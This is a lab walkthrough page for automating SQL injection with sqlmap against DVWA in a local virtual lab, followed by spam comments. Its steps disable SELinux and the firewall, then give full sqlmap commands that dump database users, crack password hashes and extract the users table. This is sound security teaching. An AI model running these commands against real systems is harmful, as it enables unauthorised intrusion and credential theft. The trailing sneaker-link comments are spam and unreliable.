Hướng Dẫn Thực Hành – Automate SQL Injection with SqlMap (DVWA): Lesson 7


Section 0. Background Information
  • References
  • Lab Notes
    • In this lab we will do the following:
      1. We will use sqlmap to obtain the following pieces of information:
        1. A list of Database Management Usernames and Passwords.
        2. A list of databases
        3. A list of tables for a specified database
        4. A list of users and passwords for a specified database table.
  • Legal Disclaimer
        Tài liệu dùng cho mục đích học tập.
Section 1. Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start –> All Program –> VMWare –> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click on the OK Button.

Section 2. Login to Fedora14
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14
      3. Play virtual machine
  2. Login to Fedora14
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

Section 3. Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications –> Terminal
  2. Switch user to root
    • Instructions:
      1. su – root
      2. <Whatever you set the root password to>
  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.106.
      • Please record your IP address.

Section 4. Temporarily Disable SELINUX and Firewall
  1. Start a Terminal Console
    • Instructions:
      1. sestatus
      2. If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
      3. If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.
    • Notes:
      • In my case, I need to temporarily put selinux in permissive mode to demonstrate basic attacks on DVWA.
  2. Place selinux in permissive mode
    • Instructions:
      1. echo 0 > /selinux/enforce
        • Placing a “0” in the enforce file, puts selinux in permissive mode.
      2. sestatus
        • Notice that “Current mode:” changed to permissive.
  3. Disable Firewall
    • Instructions:
      1. service iptables save
        • This is not really necessary, unless you have made recent changes to the firewall.
      2. service iptables stop
        • This command disables the firewall.
Section 5. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start –> All Program –> VMWare –> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

Section 6. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx

Section 7. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

Section 8. Login to DVWA
  1. Start Firefox
    • Instructions:
      1. Click on Firefox
  2. Login to DVWA
    • Instructions:
      1. Start up Firefox on BackTrack
      2. Place http://192.168.1.106/dvwa/login.php in the address bar.
        • Replace 192.168.1.106 with Fedora’s IP address obtained in (Section 3, Step 3).
      3. Login: admin
      4. Password: password
      5. Click on Login

Section 9. Set Security Level
  1. Set DVWA Security Level
    • Instructions:
      1. Click on DVWA Security, in the left hand menu.
      2. Select “low”
      3. Click Submit
Section 10. Obtain PHP Cookie
  1. SQL Injection Menu
    • Instructions:
      1. Select “SQL Injection” from the left navigation menu.
  2. Select Tamper Data
    • Instructions:
      1. Tools –> Tamper Data
  3. Start Tamper Data
    • Instructions:
      1. Click on Start Tamper
  4. Basic Injection
    • Instructions:
      1. Input “1” into the text box.
      2. Click Submit.
    • Note:
      • The goal here is see the GET request being made to the CGI program behind the scenes.
      • Also, we will use the “Surname” output with SQLMAP to obtain database username and password contents.
  5. Tamper with request?
    • Instructions:
      1. Make sure the Continue Tampering? textbox is unchecked.
      2. Then Click Submit
  6. Copying the Referer URL
    • Instructions:
      1. Select the second GET Request
      2. Right Click on the Referer Link
      3. Select Copy
  7. Open Notepad
    • Instructions:
      1. Applications –> Wine –> Programs –> Accessories –> Notepad
  8. Paste Referer URL into Notepad
    • Instructions:
      1. Edit –> Paste
  9. Copying the Cookie Information
    • Instructions:
      1. Right Click on the Cookie line
      2. Select Copy
  10. Pasting the Cookie Information
    • Instructions:
      1. Edit –> Paste
    • Notes:
      • Now you should have copied both the Referer and Cookie lines into Notepad. (See Picture)

Section 11. Using SqlMap to Obtain Current User and Database
  1. Verify sqlmap.py exists
    • Instructions:
      1. cd /pentest/database/sqlmap
      2. ls -l sqlmap.py
  2. Obtain Database User For DVWA
    • Note:
      1. Obtain the referer link from (Section 10, Step 10), which is placed after the “-u” flag below.
      2. Obtain the cookie line from (Section 10, Step 10), which is placed after the “–cookie” flag below.
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” -b –current-db –current-user
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • -b, Retrieve DBMS banner
        • –current-db, Retrieve DBMS current database
        • –current-user, Retrieve DBMS current user
  3. Do you want to keep testing?
    • Instructions:
      1. keep testing? y
      2. skip payloads? y
  4. Viewing Results
    • Instructions:
      1. For the web application DVWA, the database name is “dvwa” and the programs that communicate with the database is “root@localhost”;
Section 12. Using SqlMap to Obtain Database Management Username and Password
  • NOTE: You must have completed Lesson 4 to see the db_hacker in Step 2.
  1. Obtain Database Management Username and Password
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” –string=”Surname” –users –password
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • -string, Provide a string set that is always present after valid or invalid query.
        • –users, list database management system users
        • –password, list database management password for system users.
  2. Obtain Database Management Username and Password (Part 2)
    • Instructions:
      1. Use Dictionary Attack? Y
      2. Dictionary Location? <Press Enter>
    • Notes:
      1. Notice the password for username db_hacker was cracked.
  3. Obtain db_hacker Database Privileges
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” -U db_hacker –privileges
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • -U, Specify database management user
        • –privileges, list database management system user’s privileges
  4. View Results: Obtain db_hacker Database Privileges
    • Instructions:
      1. Notice that DBMS user “db_hacker” has administrative privileges
      2. Notice that “db_hacker” can log in from anywhere, via the “%” wildcard operator.
Section 13. Obtain a list of all Databases
  1. Obtain a list of all databases
    • Note:
      1. Obtain the referer link from (Section 10, Step 10), which is placed after the “-u” flag below.
      2. Obtain the cookie line from (Section 10, Step 10), which is placed after the “–cookie” flag below.
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” –dbs
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • –dbs, List database management system’s databases.
  2. Review Results: Obtain a list of all databases
    • Note:
      1. Notice that sqlmap supplies a list of available databases.

Section 14. Obtain “dvwa” tables and contents
  1. Obtain “dvwa” tables and contents
    • Note:
      1. Obtain the referer link from (Section 10, Step 10), which is placed after the “-u” flag below.
      2. Obtain the cookie line from (Section 10, Step 10), which is placed after the “–cookie” flag below.
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” -D dvwa –tables
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • -D, Specify Database
        • –tables, List Database Tables
  2. Viewing “dvwa” tables and content results
    • Note:
      1. Notice sqlmap listed two tables: guestbook and users.
  3. Obtain columns for table dvwa.users
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” -D dvwa -T users –columns
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • -D, Specify Database
        • -T, Specify the Database Table
        • –columns, List the Columns of the Database Table.
  4. Viewing Results: columns for table dvwa.users
    • Note:
      1. Notice that there are both a user and password columns in the dvwa.users table.
  5. Obtain Users and their Passwords from table dvwa.users (Part 1)
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” -D dvwa -T users -C user,password –dump
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • -D, Specify Database
        • -C, List user and password columns
        • –dump, Dump table contents
  6. Obtain Users and their Passwords from table dvwa.users (Part 2)
    • Instructions:
      1. Do you want to use the LIKE operator? Y
      2. Recognize possible HASH values? Y
      3. What’s the dictionary location? <Press Enter>
      4. Use common password suffixes? y
  7. Review Results: Users and their Passwords from table dvwa.users
    • Notes:
      1. Notice how sqlmap nicely displays passwords for each user.

Section 15. Proof of Lab Using John the Ripper
  1. Proof of Lab
    • Instructions:
      1. Bring up a new terminal, see (Section 7, Step 1)
      2. cd /pentest/database/sqlmap
      3. find output/* -print | xargs ls -l
      4. date
      5. echo “Your Name”
        • Replace the string “Your Name” with your actual name.
        • e.g., echo “John Gray”
    • Proof of Lab Instructions:
      1. Do a <PrtScn>
      2. Paste into a word document
      3. Email 2 CSIRT247@Gmail.Com

Comments

  • Adidas NMD XR1 Sapphire
    Trả lời

    Would you be fascinated about exchanging links?

  • yeezy boost
    Trả lời

    I actually wanted to compose a small comment so as to say thanks to you for the marvelous guidelines you are writing on this site. My incredibly long internet research has at the end of the day been recognized with sensible details to talk about with my relatives. I would tell you that we site visitors are unquestionably endowed to dwell in a fantastic site with many brilliant individuals with insightful opinions. I feel truly grateful to have encountered your entire webpages and look forward to really more amazing times reading here. Thanks once again for everything.
    yeezy boost http://urlr.be/short/yzyinc

  • off white hoodie
    Trả lời

    I happen to be writing to let you be aware of what a beneficial experience my wife’s princess obtained going through your web page. She figured out a good number of details, with the inclusion of what it is like to have a marvelous giving spirit to get certain people quite simply fully grasp a variety of impossible subject matter. You truly did more than visitors’ expected results. Thank you for presenting the warm and friendly, dependable, explanatory and also cool tips about this topic to Jane.
    off white hoodie http://www.offwhitehoodie.us.com

  • Adidas NMD x Supreme Red
    Trả lời

    Spot on with this write-up, I really think this website wants much more consideration. I抣l in all probability be once more to learn far more, thanks for that info.